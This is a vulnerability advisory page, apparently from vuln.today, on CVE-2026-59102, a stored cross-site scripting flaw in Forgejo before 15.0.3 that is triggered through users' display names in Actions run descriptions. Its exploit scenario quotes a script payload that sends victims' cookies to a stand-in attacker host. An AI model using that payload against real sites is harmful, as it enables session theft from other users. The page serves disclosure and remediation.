Skip to main content

Forgejo CVE-2026-59102

| EUVDEUVD-2026-41433 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-07-02 VulnCheck GHSA-r26p-rw8p-x468
2.1
CVSS 4.0 · Vendor: VulnCheck

Severity by source

Vendor (VulnCheck) PRIMARY
2.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.4 MEDIUM

AC:H reflects non-default DEFAULT_SHOW_FULL_NAME prerequisite; PR:L for authenticated attacker; S:C and C:L/I:L for cross-user browser impact.

3.1 AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jul 02, 2026 - 20:39 vuln.today
Severity Changed
Jul 02, 2026 - 20:22 NVD
MEDIUM LOW
CVSS changed
Jul 02, 2026 - 20:22 NVD
5.4 (MEDIUM) 2.1 (LOW)

DescriptionCVE.org

Forgejo before 15.0.3 contains a stored cross-site scripting vulnerability that allows authenticated attackers to execute arbitrary JavaScript in other users' browsers by setting a full name containing an HTML payload and triggering an Actions run. When the DEFAULT_SHOW_FULL_NAME option is enabled, the run description is assembled server-side with the user's display name interpolated into an HTML string via a translation function that does not escape its arguments, and the frontend renders the result using a Vue v-html binding, causing script execution for any user who views the affected Actions run page.

AnalysisAI

Stored XSS in Forgejo before 15.0.3 allows authenticated users to execute arbitrary JavaScript in other users' browsers by embedding an HTML payload in their display name and triggering a CI/CD Actions run. The vulnerability exists because the server-side run description assembles HTML by interpolating the user's full name through a translation function that performs no output encoding, and the frontend renders this server-generated markup via a Vue v-html binding - a classic sink for stored XSS. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Set full name to HTML/script payload
Delivery
Enable DEFAULT_SHOW_FULL_NAME on target instance (pre-condition)
Exploit
Trigger Forgejo Actions run in any accessible repository
Install
Server interpolates unsanitized full name into HTML run description
C2
Victim loads Actions run page
Execute
Vue v-html renders injected payload
Impact
Attacker JavaScript executes in victim browser

Vulnerability AssessmentAI

Exploitation Exploitation requires three concurrent conditions: (1) the Forgejo instance must have the DEFAULT_SHOW_FULL_NAME option enabled in its configuration - this is explicitly a non-default setting, so the majority of default deployments are not vulnerable; (2) the attacker must hold a valid low-privilege user account on the target Forgejo instance (PR:L), as account registration or social engineering is a prerequisite; (3) the attacker must be able to trigger a Forgejo Actions run, which requires write access to at least one repository with an Actions workflow configured. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is moderate-to-low, heavily conditional on deployment configuration. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated Forgejo user sets their account full name to a JavaScript payload such as '<script>document.location="https://attacker.example/steal?c="+document.cookie</script>' via the profile settings page. The attacker then triggers any Forgejo Actions run (e.g., pushing a commit to a repository with an Actions workflow). …
Remediation The primary fix is to upgrade to Forgejo 15.0.3 or later, as documented at https://codeberg.org/forgejo/forgejo/src/branch/forgejo/release-notes-published/15.0.3.md. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-59102 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy